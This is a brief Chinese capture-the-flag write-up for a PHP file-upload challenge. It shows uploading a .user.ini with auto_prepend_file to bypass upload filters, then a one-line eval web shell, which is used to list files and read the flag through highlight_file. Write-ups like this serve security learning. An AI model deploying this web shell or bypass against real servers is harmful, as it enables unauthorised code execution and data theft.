0x00 前言
0x01 题目
0x02 Write Up
首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件
可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:php user.ini详解
那么我们先上传.user.ini
cpp
auto_prepend_file=1.txt然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量
cpp
<?php eval($_POST['a']);上传好了之后,通过index.php进行访问
首先查看当前目录
然后通过highlight_file读取文件
以上